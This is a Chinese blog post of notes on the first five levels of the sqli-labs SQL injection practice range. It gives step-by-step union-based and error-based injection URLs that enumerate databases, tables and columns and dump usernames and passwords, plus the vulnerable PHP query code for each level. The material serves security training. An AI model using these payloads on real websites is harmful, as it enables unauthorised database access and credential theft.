sqli-lab(1-5)关卡笔记

最新推荐文章于 2024-03-06 08:45:29 发布
最新推荐文章于 2024-03-06 08:45:29 发布
阅读量494 收藏 1
点赞数 2
分类专栏: Web安全 靶场笔记 文章标签: sql 数据库 mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yoo_666/article/details/107465482
版权

sqli-lab

前言

sqli-lab是一个SQL注入练习平台,提供了GET和POST场景下各种注入类型的关卡,非常适用于小白入门学习
注:本人由于本机安装有SQL-Server,8080端口被占用,故改用8088端口

知识储备

数据库

  • MySQL内置数据库——information_schema
  • information_schema三张关键表——schemata、tables、
    columns
  • schemata表(数据库名)的schema_name列存放的是所有的数据库名
  • tables表(表名)的table_schema列存放的是所有的数据库名,
    • table_name列存放的是数据库对应的所有表名。
  • columns表(字段名)的column_name列存放的是所有的列名,
    • table_schema列存放的是数据库对应的所有数据库名,
    • table_name列存放的是数据库对应的所有数据库表名

语法

  • order by

    • 功能: 对结果集进行排序

    • order by column1 [ASC|DESC], column2 [ASC|DESC],...

  • group_concat

    • 功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

    • group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
注:separator是一个字符串值,缺省为一个逗号

  • concat_ws

    • 功能:将多个字符串连接成一个字符串

    • concat_ws(separator, str1, str2, ...)
注:第一个参数为指定分隔符

#获取所有的数据库名
mysql>select group_concat(convert(schema_name using gbk)) from
information_schema.schemata;
#获取test数据库下的所有表名
mysql>select group_concat(convert(table_name using gbk)) from
information_schema.tables where table_schema='sqltest_sec';
#获取test数据库下的admin表下的所有列名
mysql>select group_concat(convert(column_name using gbk)) from
information_schema.columns where table_schema='cms' and table_name='cms_users';
#获取数据
mysql>select column from tables

第一关

  1. 查询id的类型
http://127.0.0.1/sqli-labs/Less-1/?id=1
http://127.0.0.1/sqli-labs/Less-1/?id=1'  //报错

在这里插入图片描述
通过报错语句继续构造闭合

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=1 --+   //返回正常
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 --+   //返回错误

可知该关卡为单引号字符型注入

  1. 查列数

通过1,2,3,4逐数测试得出字段数为3

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+

在这里插入图片描述

  1. 找回显位置
    利用union select 联合查询找出回显位置
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),database() --+
注:该步需要对id值赋假,用于回显查看下一步查询变量应置于哪里

在这里插入图片描述

  1. 爆数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述

  1. 爆表名(security库下)
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述

  1. 爆列名(user表下)
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

在这里插入图片描述

  1. 爆用户名和密码
    注:该地方可用group_concat(concat_ws())嵌套使用爆出用户名密码,但在该靶场,有两处回显位置,可使用两个group_concat分别爆出用户名和密码
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(concat_ws(':',username,password)),3 from users --+

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

在这里插入图片描述

  1. 后台源码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

第二关

  1. 对id值进行测试闭合,检查注入类型
   http://127.0.0.1/sqli-labs/Less-2/?id=1
   http://127.0.0.1/sqli-labs/Less-2/?id=1' --+//报错
   http://127.0.0.1/sqli-labs/Less-2/?id=1' or 1=1 --+//报错

通过对id值的闭合,可知该关卡为数字型注入

  1. 根据第一关的方法,构造语句
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

在这里插入图片描述

  1. 后台源码
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

第三关

  1. 对id值进行测试闭合,检查注入类型
http://127.0.0.1/sqli-labs/Less-2/?id=1
http://127.0.0.1/sqli-labs/Less-2/?id=1' --+   //报错
http://127.0.0.1/sqli-labs/Less-3/?id=1') --+  //闭合语句

通过闭合id值,可知该关卡为单引号变形字符型注入(单引号与括号)

  1. 构造语句
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(username) 
from users--+

在这里插入图片描述

  1. 后台源码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

第四关

  1. 对id值进行测试闭合,检查注入类型
http://127.0.0.1/sqli-labs/Less-4/?id=1' --+//回显正常
http://127.0.0.1/sqli-labs/Less-4/?id=1') --+//回显正常
http://127.0.0.1/sqli-labs/Less-4/?id=1" --+//报错
http://127.0.0.1/sqli-labs/Less-4/?id=1") --+//闭合语句

通过闭合id值,该关卡为双引号变形字符型注入(双引号和括号)

  1. 构造语句
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(username) 
from users--+

在这里插入图片描述

  1. 后台源码
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

第五关

  1. 对id值进行测试闭合,检查注入类型
http://127.0.0.1/sqli-labs/Less-5/?id=1
http://127.0.0.1/sqli-labs/Less-5/?id=1' --+//闭合单引号

通过闭合id值,该关卡为单引号字符型注入,但根据页面回显并不是前面关卡的单引号字符型注入类型,而是双查询注入的单引号字符型注入
在这里插入图片描述

  1. 构造语句
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

由于该关卡回显比较特殊,故该语句有点不完全
在这里插入图片描述

  1. 后台源码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
Yoo_666
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5575
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labtxt
07-22
sqli-lab1~10的通txt,其中包含了入代码以及相解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
小菜鸡的学习笔记——sql注入sqli-lab边学边练
m0_51581045的博客
03-03 3719
小菜鸡也有大梦想
Sqli-lab教程-史上最全详解(1-22通
最新发布
Innocence_0的博客
03-06 561
Less-1 联合入Less-2Less-3Less-4Less-5 报错入/布尔盲/时间盲Less-6 报错入/布尔盲/时间盲Less-7 文件导出Less-8 布尔盲/时间盲Less-9 时间盲Less-10 时间盲Less-11 post入Less-12 post入Less-13 post盲Less-14 post盲Less-15 时间盲Less-16 时间盲Less-17 修改密码Less-18 user-agent头入。
sqli-labs 1-5
qq_41326328的博客
03-28 1185
这次写一个sql注入的闯游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 入分为数字型入和字符串型入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型入,回显一致的话再继续判断 ?di=1’ ...
手把手教你通 SQLi - labs 1~5
在下小黄的博客
09-09 447
Background -1 SQL注入基础知识 Less -1 基于错误的GET单引号字符型入 手工入: 代码审计: 检查完源码之后,我们发现这里传递参数的单引号出现了问题,我们可以尝试进行入。 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_G
sqli_lab
ing_end的博客
03-05 3463
读写文件 此状态不允许导入导出状态 修改限制成功 – (这里有一个空格,–空格)在SQL内表示释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 显示位: 这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,
SQL注入——sqli-labs靶场闯(1~5)
qq_52072846的博客
02-24 1802
Less-1 Error Based- String 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符入 3.输入--+将sql后面的语句视掉后,发现页面回显正常,则证明这个地方是单引号字符型入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。 5.将id=1改为一...
sqli-lab教程——1-35通
缘木之鱼
05-08 5632
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
SQLI-LABS靶场第三手工
x15wda33的博客
06-15 159
解答1:无法判定是否有sql注入漏洞渗透测试本身在于尝试,我们只能说具有什么漏洞的特征,根据猜测去尝试有没有,并加以证明。使用 ‘)方式可以闭合成功,这里显示列数不足,这是因为没有对应上表中的列,但可以判定闭合成功且可以使用联合查询。解答3::无法判定闭合条件是什么,除非可以看到源码,但渗透测试时几乎不会看到源码,这也是一个大胆假设小心求证的过程。这里我们不难看出当我们输入id=1,id=2时会出现类似界面的不同字段这时我们可以尝试以id作为入点尝试入。id=字段但是却sql注入不出来?
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
XSS绕过之PHP htmlspecialchars() 函数
Yoo_666的博客
07-13 7074
文章目录前言htmlspecialchars()函数定义语法用法预定义的字符参数可用的引号类型:实例默认编码( 仅编码双引号)编码双引号和单引号相靶场推荐 前言 xss-lab靶场中从第二开始就开始设置利用htmlspecialchars()函数进行实体转换的防御措施,但大多数都可以利用单引号绕过,本文针对htmlspecialchars()函数在xss中绕过而展开,并未对htmlspecialchars() 函数进行完整介绍,若想对htmlspecialchars()函数进行深入学习,点击下方链接右转
PHP表单验证之$_SERVER[“PHP_SELF“] 变量
Yoo_666的博客
08-05 2410
文章目录前言$_SERVER["PHP_SELF"] 变量定义利用防御htmlspecialchars() 函数 前言 近来在复习PHP的知识,,在php表单验证这块遇到了之前学习的htmlspecialchars() 函数,并且也从理论上理解了htmlspecialchars()函数的作用,及xss攻击形成的原因 $_SERVER[“PHP_SELF”] 变量 定义 $_SERVER[“PHP_SELF”] 是一种超全局变量,它返回当前执行脚本的文件名 $_SERVER[“PHP_SELF”] 将表单数
点击劫持之iframe覆盖 学习笔记
Yoo_666的博客
07-25 1136
文章目录点击劫持分类iframe覆盖原理相技术运用结合CSRF结合XSS示例代码防御方法X-FRAME-OPTIONS机制使用 FrameBusting 代码使用认证码认证用户 点击劫持 点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段 分类 iframe覆盖 图片覆盖 iframe覆盖 原理 攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击
sqli-lab安装
09-05
5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值